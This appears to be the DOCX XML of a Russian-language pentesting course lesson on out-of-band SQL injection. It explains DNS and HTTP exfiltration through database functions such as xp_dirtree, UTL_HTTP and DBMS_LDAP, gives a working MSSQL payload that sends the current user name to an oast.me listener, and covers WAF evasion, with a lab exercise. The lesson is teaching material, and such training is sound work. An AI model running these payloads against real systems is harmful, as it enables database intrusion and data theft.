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0"/>
        <w:jc w:val="left"/>
        <w:shd w:val="clear" w:color="auto" w:fill="0F1B3A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  SIGMA  ·  ОТДЕЛЬНЫЙ УРОК  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="B88B2A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SQL-ИНЪЕКЦИИ: ПРОДВИНУТЫЙ УРОВЕНЬ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Модуль 2: Продвинутая эксфильтрация и экспертный аудит  ·  Урок 2.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Продвинутые инъекции: Сложные сценарии и автоматизация</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="2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~9 мин · теория · практика</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Прорыв изоляции: Анатомия Out-of-band эксфильтрации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Представьте, что вы пытаетесь вынести секретные чертежи из здания с вооруженной охраной на каждом выходе. Вы не можете вынести их в руках или карманах — обычные каналы вывода (HTTP-ответы сервера) тщательно проверяются WAF и системами предотвращения утечек. Однако у здания есть вентиляция, водопровод или сигнальные огни на крыше. Если вы сможете передать информацию через эти побочные каналы, охрана на дверях окажется бесполезной. В мире веб-безопасности такая техника называется Out-of-band (OOB) SQL-инъекцией.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Для пентестера уровня Middle это «золотой стандарт» эффективности. Когда классические методы Error-based не работают из-за подавления ошибок, а Blind-методы (Boolean или Time-based) превращаются в многочасовое ожидание и тысячи запросов, OOB позволяет извлечь данные одним точным ударом. Мы заставляем сервер базы данных не возвращать ответ приложению, а самостоятельно инициировать соединение с подконтрольным нам узлом, передавая украденные данные прямо в параметрах этого запроса.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Механика внешнего взаимодействия СУБД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Суть OOB-атаки заключается в использовании встроенных функций СУБД, которые предназначены для взаимодействия с файловой системой или сетью. В современных инфраструктурах базы данных редко живут в вакууме: им нужно проверять сертификаты, обращаться к активным каталогам (LDAP) или загружать внешние XML-схемы. Именно эти легитимные возможности становятся рычагом для эксфильтрации. Самым универсальным и скрытным протоколом для этого является DNS.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DNS идеально подходит для обхода сетевых ограничений, так как запросы на разрешение доменных имен часто разрешены даже в самых жестких корпоративных сетях, где прямой HTTP-трафик наружу заблокирован. Когда вы внедряете в SQL-запрос функцию, пытающуюся разрешить имя вроде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v3ry_s3cr3t_p4ssw0rd.attacker.com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, запрос уходит на вышестоящий DNS-сервер, а затем попадает на ваш авторитарный сервер имен. База данных выступает в роли «курьера», который сам доставляет вам данные, не подозревая о компрометации.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Для успешной реализации атаки необходимо выполнение двух условий: наличие у СУБД прав на выполнение сетевых функций и отсутствие блокировки исходящего трафика на уровне сетевого экрана (Egress filtering). Несмотря на кажущуюся сложность настройки, OOB-атаки на порядок стабильнее Time-based методов, которые крайне чувствительны к сетевым задержкам и нагрузке на сервер, часто приводя к ложноотрицательным результатам.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Реализация для различных диалектов SQL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Каждая СУБД имеет свои специфические «двери» для выхода во внешний мир. В Microsoft SQL Server классическим инструментом является процедура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master..xp_dirtree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. Хотя она предназначена для просмотра структуры папок, она поддерживает использование путей в формате UNC (Universal Naming Convention). Если передать ей путь вида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\\data-to-steal.your-domain.com\a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, SQL Server инициирует DNS-запрос для поиска этого хоста, чтобы затем попытаться подключиться к нему по протоколу SMB.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В Oracle Database ситуация интереснее. Здесь часто используется пакет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UTL_HTTP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или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DBMS_LDAP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. Однако даже если прямой доступ к ним ограничен, можно эксплуатировать функционал XML-парсеров. Функция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extractvalue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в сочетании с запросом к внешнему ресурсу через протокол HTTP или FTP позволяет не просто отправить данные, но и получить подтверждение доставки. Для атакующего это означает возможность выстраивать сложные цепочки извлечения данных, обходя ограничения на длину DNS-метки (которая не может превышать 63 символа).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PostgreSQL долгое время считался наиболее устойчивым к OOB, но расширения вроде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dblink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или специфические функции работы с файлами (через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copy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или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lo_export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в сторону сетевых ресурсов) позволяют добиться аналогичного результата. Важно понимать, что в современных версиях СУБД многие из этих функций по умолчанию ограничены правами суперпользователя, поэтому успех OOB-атаки часто напрямую зависит от качества конфигурации прав доступа в целевой системе.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Подготовка инфраструктуры и работа с Interactsh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Для приема данных вам не обязательно поднимать собственный BIND-сервер и настраивать зоны. Существуют специализированные инструменты, такие как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Interactsh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(от ProjectDiscovery) или классический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Burp Collaborator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Они предоставляют готовый сервер, который слушает запросы по протоколам DNS, HTTP, SMTP и LDAP, мгновенно отображая входящие соединения в интерфейсе.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Типовой алгоритм действий выглядит следующим образом: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Вы генерируете уникальный домен (например,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c123.oast.me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).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Формируете полезную нагрузку, которая конкатенирует результат вашего целевого запроса с этим доменом.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Отправляете запрос к уязвимому приложению.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Наблюдаете за панелью мониторинга.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Рассмотрим пример для MS SQL Server, где мы хотим извлечь имя текущего пользователя. Полезная нагрузка может выглядеть так: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DECLARE @p varchar(1024); SET @p = (SELECT USER_NAME()) + '.c123.oast.me'; EXEC('master..xp_dirtree "\\' + @p + '\a"');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Здесь мы сначала сохраняем данные в переменную, добавляем к ним наш домен и заставляем систему выполнить поиск этого «пути». В логах вашего DNS-слушателя появится запись о попытке разрешения имени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dbo.c123.oast.me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, что и будет являться искомым ответом.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Кейс: Обход слепой инъекции в высоконагруженной системе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Представьте сценарий: вы обнаружили Blind SQL-инъекцию в API-методе крупного интернет-магазина. Попытки использовать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SLEEP()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или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WAITFOR DELAY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дают нестабильный результат, так как время отклика сервера колеблется от 100мс до 5с из-за распродажи. Использование Boolean-based метода требует по 8 запросов на каждый символ, что при извлечении длинного хеша пароля создает подозрительную активность в логах.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Применяя OOB через DNS, вы сокращаете количество запросов до одного на каждую запись. Более того, вы можете использовать функции кодирования, такие как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base64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или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hex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, прямо внутри SQL-запроса, чтобы избежать проблем со спецсимволами в DNS-именах. В одном из реальных аудитов это позволило извлечь конфигурационные данные из таблицы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sys.configurations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за считанные секунды, в то время как классический «слепой» метод предсказывал время завершения через 40 минут.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Этот подход также эффективен против WAF, которые настроены на поиск паттернов типичных Blind-атак (длинные цепочки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OR 1=1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,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UNION SELECT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или специфические задержки). Запрос на обращение к сетевому пути часто выглядит для фильтров как легитимная бизнес-логика или менее приоритетная аномалия, особенно если вы используете нестандартные функции СУБД.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Практическое задание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Для закрепления материала воспользуйтесь локальным стендом с установленной MS SQL Server или Oracle DB. Ваша задача — настроить бесплатный экземпляр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Interactsh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(или аналогичный сервис) и выполнить следующие шаги:</w:t>
      </w:r>
    </w:p>
    <w:p/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Сформируйте запрос для извлечения версии СУБД (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@@version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для MSSQL или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select version from v$instance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для Oracle).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Оберните результат в функцию кодирования Base64 (или Hex), чтобы гарантировать валидность DNS-имени.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Сконструируйте финальную полезную нагрузку, инициирующую DNS-запрос к вашему субдомену.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Проверьте логи вашего слушателя и декодируйте полученное значение.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Попробуйте также реализовать атаку через HTTP-протокол (например, используя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UTL_HTTP.request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в Oracle), если сетевые настройки вашего стенда позволяют исходящие соединения на 80/443 порты. Сравните скрытность обоих методов в логах сервера.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Чек-лист ключевых идей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OOB-атаки используют СУБД как клиента для передачи данных на внешний сервер через DNS или HTTP.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Основное преимущество — скорость и стабильность в условиях нестабильного отклика сервера или жесткой фильтрации вывода.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DNS-эксфильтрация наиболее эффективна для обхода межсетевых экранов благодаря доверию к трафику на 53 порт.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Основные векторы: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xp_dirtree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(MSSQL),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UTL_HTTP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/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DBMS_LDAP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(Oracle), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>load_file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(MySQL на Windows).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Для успешной атаки необходимы права на выполнение сетевых функций и возможность исходящих соединений.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Использование специализированных слушателей (Interactsh, Burp Collaborator) критически упрощает эксплуатацию.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OOB-инъекции — это мощный инструмент, но они требуют понимания того, как СУБД взаимодействует с операционной системой и сетью. Однако иногда даже этого недостаточно, если уязвимость запрятана глубоко в логике приложения и не проявляется сразу. На следующем уроке мы разберем технику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Second-Order SQLi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, где данные, внедренные сегодня, «взрываются» завтра, и научимся находить эти отложенные угрозы в сложных архитектурных решениях.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4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Часть курса «SQL-инъекции продвинутого уровня: от обхода WAF до эксплуатации Second-Order и Out-of-band атак»  ·  Сгенерировано: 15.06.2026, 09:50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80"/>
      <w:outlineLvl w:val="2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